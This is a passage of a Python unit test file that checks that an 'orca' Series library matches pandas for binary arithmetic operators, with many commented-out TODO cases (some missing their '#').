# c1 = ps.add(1)
# c2 = os.add(1).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_add_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps + [1, 2, 12, 10]
c2 = (os + [1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2)
c1 = ps.add([1, 2, 12, 10])
# TODO: orca.Series.add([1, 2, 12, 10])
# c2 = os.add([1, 2, 12, 10]).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_add_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
c1 = ps + psb
c2 = (os + osb).to_pandas()
assert_series_equal(c1, c2)
# series with series expression
c1 = ps + (1 / psb)
c2 = (os + (1 / osb)).to_pandas()
assert_series_equal(c1, c2)
# series expression with series expression
c1 = (ps * [1, 3, 5, 4]) + (1 / psb)
c2 = ((os * [1, 3, 5, 4]) + (1 / osb)).to_pandas()
assert_series_equal(c1, c2)
c1 = pdf["float"] + pdf["int"]
c2 = (odf["float"] + odf["int"]).to_pandas()
assert_series_equal(c1, c2)
# series with series
# default axis=0
c1 = ps.add(psb)
c2 = os.add(osb).to_pandas()
assert_series_equal(c1, c2)
# specify axis=0
c1 = ps.add(psb, axis=0)
c2 = os.add(osb, axis=0).to_pandas()
assert_series_equal(c1, c2)
# specify axis=1, ValueError expected
# TODO: ValueError expected: orca.Series.add(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.add(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.add(osb, axis=1)
def test_series_binary_operator_function_sub_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps - 1
c2 = (os - 1).to_pandas()
assert_series_equal(c1, c2)
TODO: orca.Series.sub(1)
# c1 = ps.sub(1)
# c2 = os.sub(1).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_sub_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps - [1, 2, 12, 10]
c2 = (os - [1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2)
c1 = ps.sub([1, 2, 12, 10])
TODO: orca.Series.sub([1, 2, 12, 10])
# c2 = os.sub([1, 2, 12, 10]).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_sub_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
c1 = ps - psb
c2 = (os - osb).to_pandas()
assert_series_equal(c1, c2)
# series with series expression
c1 = ps - (1 / psb)
c2 = (os - (1 / osb)).to_pandas()
assert_series_equal(c1, c2)
# series expression with series expression
c1 = (ps * [1, 3, 5, 4]) - (1 / psb)
c2 = ((os * [1, 3, 5, 4]) - (1 / osb)).to_pandas()
assert_series_equal(c1, c2)
TODO: odf["float"] - odf["int"]
# c1 = pdf["float"] - pdf["int"]
# c2 = (odf["float"] - odf["int"]).to_pandas()
# assert_series_equal(c1, c2)
# series with series
# default axis=0
TODO: orca.Series.sub(orca.Series())
# c1 = ps.sub(psb)
# c2 = os.sub(osb).to_pandas()
# assert_series_equal(c1, c2)
# specify axis=0
c1 = ps.sub(psb, axis=0)
c2 = os.sub(osb, axis=0).to_pandas()
assert_series_equal(c1, c2)
# specify axis=1, ValueError expected
TODO: orca.Series.sub(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.sub(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.sub(osb, axis=1)
def test_series_binary_operator_function_mul_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps * 1
c2 = (os * 1).to_pandas()
assert_series_equal(c1, c2)
TODO: orca.Series.mul(1)
# c1 = ps.mul(1)
# c2 = os.mul(1).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_mul_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps * [1, 2, 12, 10]
c2 = (os * [1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2)
TODO: orca.Series.mul([1, 2, 12, 10])
# c1 = ps.mul([1, 2, 12, 10])
# c2 = os.mul([1, 2, 12, 10]).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_mul_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
c1 = ps * psb
c2 = (os * osb).to_pandas()
assert_series_equal(c1, c2)
# series with series expression
c1 = ps * (1 / psb)
c2 = (os * (1 / osb)).to_pandas()
assert_series_equal(c1, c2)
# series expression with series expression
c1 = (ps * [1, 3, 5, 4]) * (1 / psb)
c2 = ((os * [1, 3, 5, 4]) * (1 / osb)).to_pandas()
assert_series_equal(c1, c2)
TODO: odf["float"] * odf["int"]
# c1 = pdf["float"] * pdf["int"]
# c2 = (odf["float"] * odf["int"]).to_pandas()
# assert_series_equal(c1, c2)
# series with series
# default axis=0
TODO: orca.Series.mul(orca.Series())
# c1 = ps.mul(psb)
# c2 = os.mul(osb).to_pandas()
# assert_series_equal(c1, c2)
# specify axis=0
c1 = ps.mul(psb, axis=0)
c2 = os.mul(osb, axis=0).to_pandas()
assert_series_equal(c1, c2)
# specify axis=1, ValueError expected
TODO: orca.Series.mul(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.mul(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.mul(osb, axis=1)
def test_series_binary_operator_function_div_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps / 1
c2 = (os / 1).to_pandas()
assert_series_equal(c1, c2)
# TODO: orca.Series.div(1)
# c1 = ps.div(1)
# c2 = os.div(1).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_div_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps / [1, 2, 12, 10]
c2 = (os / [1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2)
TODO: orca.Series.div([1, 2, 12, 10])
# c1 = ps.div([1, 2, 12, 10])
# c2 = os.div([1, 2, 12, 10]).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_div_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
c1 = ps / psb
c2 = (os / osb).to_pandas()
assert_series_equal(c1, c2)
# series with series expression
c1 = ps / (1 + psb)
c2 = (os / (1 + osb)).to_pandas()
assert_series_equal(c1, c2)
# series expression with series expression
c1 = (ps - [1, 3, 5, 4]) / (1 + psb)
c2 = ((os - [1, 3, 5, 4]) / (1 + osb)).to_pandas()
assert_series_equal(c1, c2)
TODO: odf["float"] / odf["int"]
# c1 = pdf["float"] / pdf["int"]
# c2 = (odf["float"] / odf["int"]).to_pandas()
# assert_series_equal(c1, c2)
# default axis=0
TODO: orca.Series.div(orca.Series())
# c1 = ps.div(psb)
# c2 = os.div(osb).to_pandas()
# assert_series_equal(c1, c2)
# specify axis=0
c1 = ps.div(psb, axis=0)
c2 = os.div(osb, axis=0).to_pandas()
assert_series_equal(c1, c2)
# specify axis=1, ValueError expected
TODO: orca.Series.div(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.div(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.div(osb, axis=1)
def test_series_binary_operator_function_truediv_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
# TODO: orca.Series.truediv(1)
# c1 = ps.truediv(1)
# c2 = os.truediv(1).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_truediv_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
TODO: orca.Series.truediv([1, 2, 12, 10])
# c1 = ps.truediv([1, 2, 12, 10])
# c2 = os.truediv([1, 2, 12, 10]).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_truediv_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
# default axis=0
TODO: orca.Series.truediv(orca.Series())
# c1 = ps.truediv(psb)
# c2 = os.truediv(osb).to_pandas()
# assert_series_equal(c1, c2)
# specify axis=0
c1 = ps.truediv(psb, axis=0)
c2 = os.truediv(osb, axis=0).to_pandas()
assert_series_equal(c1, c2)
# specify axis=1, ValueError expected
TODO: orca.Series.truediv(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.truediv(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.truediv(osb, axis=1)
def test_series_binary_operator_function_floordiv_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps // 1
c2 = (os // 1).to_pandas()
assert_series_equal(c1, c2)
TODO: orca.Series.floordiv(1)
# c1 = ps.floordiv(1)
# c2 = os.floordiv(1).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_floordiv_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps // [1, 2, 12, 10]
c2 = (os // [1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2)
TODO: orca.Series.floordiv([1, 2, 12, 10])
# c1 = ps.floordiv([1, 2, 12, 10])
# c2 = os.floordiv([1, 2, 12, 10]).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_floordiv_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
c1 = ps // psb
c2 = (os // osb).to_pandas()
assert_series_equal(c1, c2)
# series with series expression
c1 = ps // (1 + psb)
c2 = (os // (1 + osb)).to_pandas()
assert_series_equal(c1, c2)
# series expression with series expression
c1 = (ps - [1, 3, 5, 4]) // (1 + psb)
c2 = ((os - [1, 3, 5, 4]) // (1 + osb)).to_pandas()
assert_series_equal(c1, c2)
TODO: odf["float"] // odf["int"]
# c1 = pdf["float"] // pdf["int"]
# c2 = (odf["float"] // odf["int"]).to_pandas()
# assert_series_equal(c1, c2)
# series with series
# default axis=0
TODO: orca.Series.floordiv(orca.Series())
# c1 = ps.floordiv(psb)
# c2 = os.floordiv(osb).to_pandas()
# assert_series_equal(c1, c2)
# specify axis=0
c1 = ps.floordiv(psb, axis=0)
c2 = os.floordiv(osb, axis=0).to_pandas()
assert_series_equal(c1, c2)
# specify axis=1, ValueError expected
TODO: orca.Series.floordiv(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.floordiv(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.floordiv(osb, axis=1)
def test_series_binary_operator_function_mod_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps % 1
c2 = (os % 1).to_pandas()
assert_series_equal(c1, c2)
TODO: orca.Series.mod(1)
# c1 = ps.mod(1)
# c2 = os.mod(1).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_mod_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps % [1, 2, 12, 10]
c2 = (os % [1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2)
TODO: orca.Series.mod([1, 2, 12, 10])
# c1 = ps.mod([1, 2, 12, 10])
# c2 = os.mod([1, 2, 12, 10]).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_mod_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
c1 = ps % psb
c2 = (os % osb).to_pandas()
assert_series_equal(c1, c2)
# series with series expression
c1 = ps % (1 + psb)
c2 = (os % (1 + osb)).to_pandas()
assert_series_equal(c1, c2)
# series expression with series expression
c1 = (ps - [1, 3, 5, 4]) % (1 + psb)
c2 = ((os - [1, 3, 5, 4]) % (1 + osb)).to_pandas()
assert_series_equal(c1, c2)
TODO: odf["float"] % odf["int"]
# c1 = pdf["float"] % pdf["int"]
# c2 = (odf["float"] % odf["int"]).to_pandas()
# assert_series_equal(c1, c2)
# series with series
# default axis=0
TODO: orca.Series.mod(orca.Series())
# c1 = ps.mod(psb)
# c2 = os.mod(osb).to_pandas()
# assert_series_equal(c1, c2)
# specify axis=0
c1 = ps.mod(psb, axis=0)
c2 = os.mod(osb, axis=0).to_pandas()
assert_series_equal(c1, c2)
# specify axis=1, ValueError expected
TODO: orca.Series.mod(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.mod(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.mod(osb, axis=1)
def test_series_binary_operator_function_pow_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps ** 1
c2 = (os ** 1).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
TODO: orca.Series.pow(1)
# c1 = ps.pow(1)
# c2 = os.pow(1).to_pandas()
# assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_pow_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps ** [1, 2, 12, 10]
c2 = (os ** [1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
TODO: orca.Series.pow([1, 2, 12, 10])
# c1 = ps.pow([1, 2, 12, 10])
# c2 = os.pow([1, 2, 12, 10]).to_pandas()
# assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_pow_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
c1 = ps ** psb
c2 = (os ** osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# series with series expression
c1 = ps ** (1 + psb)
c2 = (os ** (1 + osb)).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# series expression with series expression
c1 = (ps - [1, 3, 5, 4]) ** (1 + psb)
c2 = ((os - [1, 3, 5, 4]) ** (1 + osb)).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
TODO: odf["float"] ** odf["int"]
# c1 = pdf["float"] ** pdf["int"]
# c2 = (odf["float"] ** odf["int"]).to_pandas()
# assert_series_equal(c1, c2, check_dtype=False)
# series with series
# default axis=0
TODO: orca.Series.pow(orca.Series())
# c1 = ps.pow(psb)
# c2 = os.pow(osb).to_pandas()
# assert_series_equal(c1, c2, check_dtype=False)
# specify axis=0
c1 = ps.pow(psb, axis=0)
c2 = os.pow(osb, axis=0).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
TODO: orca.Series.pow(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.pow(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.pow(osb, axis=1)
def test_series_binary_operator_function_radd_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.radd(1)
c2 = os.radd(1).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_radd_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.radd([1, 2, 12, 10])
c2 = os.radd([1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_radd_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
# default axis=0
c1 = ps.radd(psb)
c2 = os.radd(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=0
# TODO: raise error: orca.Series.radd(orca.Series(), axis=0)
# c1 = ps.radd(psb, axis=0)
# c2 = os.radd(osb, axis=0).to_pandas()
# assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
# TODO: ValueError expected orca.Series.radd(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.radd(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.radd(osb, axis=1)
def test_series_binary_operator_function_rsub_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.rsub(1)
c2 = os.rsub(1).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rsub_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.rsub([1, 2, 12, 10])
c2 = os.rsub([1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rsub_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
# default axis=0
c1 = ps.rsub(psb)
c2 = os.rsub(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=0
c1 = ps.rsub(psb, axis=0)
c2 = os.rsub(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
TODO: orca.Series.rsub(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.rsub(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.rsub(osb, axis=1)
def test_series_binary_operator_function_rmul_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.rmul(1)
c2 = os.rmul(1).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rmul_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.rmul([1, 2, 12, 10])
c2 = os.rmul([1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rmul_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
# default axis=0
c1 = ps.rmul(psb)
c2 = os.rmul(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=0
c1 = ps.rmul(psb, axis=0)
c2 = os.rmul(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
TODO: orca.Series.rmul(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.rmul(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.rmul(osb, axis=1)
def test_series_binary_operator_function_rdiv_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.rdiv(1)
c2 = os.rdiv(1).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rdiv_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.rdiv([1, 2, 12, 10])
c2 = os.rdiv([1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rdiv_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
